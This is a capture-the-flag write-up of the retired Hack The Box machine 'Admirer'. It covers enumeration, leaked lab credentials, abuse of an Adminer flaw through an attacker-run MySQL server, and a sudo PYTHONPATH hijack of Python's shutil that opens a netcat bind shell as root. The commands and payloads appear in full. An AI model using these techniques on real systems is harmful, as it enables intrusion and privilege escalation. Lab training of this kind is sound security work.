Writeup: Admirer
By: Date: 2021-08-10 Categories: CTF,Hack The Box

Admirer is a now a retired box on “Hack The Box” with attack-vectors in Web and SQL.

Information gathering

IP of server: 10.10.10.187

Controlling the usual suspects revealed a webpage on port 80 which led to further enumeration.

Scan

NMAP

Found open ports: 21, 22, 80

# Nmap 7.80 scan initiated Tue Sep  1 18:54:41 2020 as: nmap -p21,22,80 -sC -sV -Pn -oA nmap/admirer --script vuln -vvv 10.10.10.187

Nmap scan report for 10.10.10.187
Host is up, received user-set (0.030s latency).
Scanned at 2020-09-01 18:55:18 CEST for 29s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))

| http-enum: 
|_  /robots.txt: Robots file

Contents of robots.txt

robots.txt
User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

Enumeration

Gobuster

To see what might be hidden under /admin-dir, gobuster was used.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 40 -s 301,302,200,401,403 -u http://10.10.10.187/admin-dir/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir/
[+] Threads:        40
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,301,302,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/01 19:59:33 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
===============================================================
2020/09/01 19:59:39 Finished
===============================================================

WFuzz

Another tool that can be used to find the files is WFuzz, it’s all about which wordlist to use.

$ wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc=403,404 http://10.10.10.187/admin-dir/FUZZ                                                  130 тип

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.187/admin-dir/FUZZ
Total requests: 4658

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                 
===================================================================

000001205:   200        29 L     39 W     350 Ch      "contacts.txt"                                                                                          
000001273:   200        11 L     13 W     136 Ch      "credentials.txt"      

Findings

Users found in contacts.txt under /admin-dir/

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

Credentials found in credentials.txt under /admin-dir/

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

The FTP account worked on port 21 and permitted downloading of a SQL dump and the compressed version of the site. When extracting the compressed version another folder called “utility-scripts” is revealed. Trying it on the target, reveals that they can be run:

http://10.10.10.187/utility-scripts/info.php
http://10.10.10.187/utility-scripts/admin_tasks.php

The extracted version also contained the DB credentials:

db_admin.php        
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

Attack

One of the pages (http://10.10.10.187/utility-scripts/adminer.php) permits access to the adminer tool, which has a vulnerability (https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool). This requires setting up a local SQL server for the exploit to work.

# start the mysql server/service and login to the management console
sudo systemctl start mysql 
sudo mysql 
  
# create DB
CREATE DATABASE admirer;
  
# create user
INSERT INTO mysql.user (User,Host,authentication_string,ssl_cipher,x509_issuer,x509_subject) VALUES('user','%',PASSWORD('password1'),'','','');
  
# tell mysql to re-read config, to activate the changes
FLUSH PRIVILEGES;

# change DB
USE admirer;

# fix permissions for the user 
GRANT ALL PRIVILEGES ON *.* TO 'user'@'%';

#create test-table where all the data will land 
create table test(data VARCHAR(255));


# enable remote access to the DB 
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf 
change bind-address from 127.0.0.1 to 0.0.0.0

# restart mysql to activate the changes 
sudo systemctl restart mysql

after it's booted and done, connect adminer to our local DB 

had some issues first, but after a curl:

curl "http://10.10.10.187/utility-scripts/adminer.php?server=10.10.14.16&username=user&db=admirer"

and some manual refreshing of the page, it eventually logs in.

After playing around a bit inside the interface, it revealed some juicy information:

INSERT INTO `test` (`data`) VALUES
('                        $servername = \"localhost\";'),
('                        $username = \"waldo\";'),
('                        $password = \"&<h5b~yK3F#{PaPB&dA}{H>\";'),
('                        $dbname = \"admirerdb\";');

the waldo user exists on the box and it turns out that he likes to re-use passwords, meaning this is his SSH password:

&<h5b~yK3F#{PaPB&dA}{H>

Privilege Escalation

After SSH’ing in as waldo, the user flag is:

waldo@admirer:~$ cat user.txt 
70b98c6e7c3d753017c20f10184ce382

Waldo is also allowed to use Sudo together with a couple of commands:

waldo@admirer:~$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

the script admin_tasks.sh calls on a backup.py script:

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then                                                                             
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else               
        echo "Insufficient privileges to perform the selected operation."
    fi                       
}                  

And the backup.py script imports a module called “shutil” which can be hijacked and suited to the needs of an attacker, because of the previously mentioned sudo permissions.

#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

Create a folder under /tmp to put the shutil.py file:

mkdir -p /tmp/temp && cd /tmp/temp
vim shutil.py

Contents of shutil.py:

import os
os.system("nc -lvp 9001 -e /bin/bash")

To trick python into using the $pwd (current folder) to import the modified shutil.py , an extra command can be added:

waldo@admirer:/tmp/temp$ sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp/temp$ listening on [any] 9001 ...

Root

Because a bind-shell is created on port 9001, all that is left to do is connecting with netcat:

$ nc -nv 10.10.10.187 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.187:9001.
id
uid=0(root) gid=0(root) groups=0(root)

# Upgrade to a more interactive shell/prompt
python -c 'import pty;pty.spawn("/bin/bash")'
root@admirer:/tmp/temp# ls
shutil.py

root@admirer:/tmp/temp# cd /root
root@admirer:/root# ls
root.txt

root@admirer:/root# cat root.txt
42616c7ad960081e92e84a6714880ce1

root@admirer:/root# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:43:24 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.187/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4324/64 scope global mngtmpaddr dynamic 
       valid_lft 85923sec preferred_lft 13923sec
    inet6 fe80::250:56ff:feb9:4324/64 scope link 
       valid_lft forever preferred_lft forever

Leave a Reply

Your email address will not be published. Required fields are marked *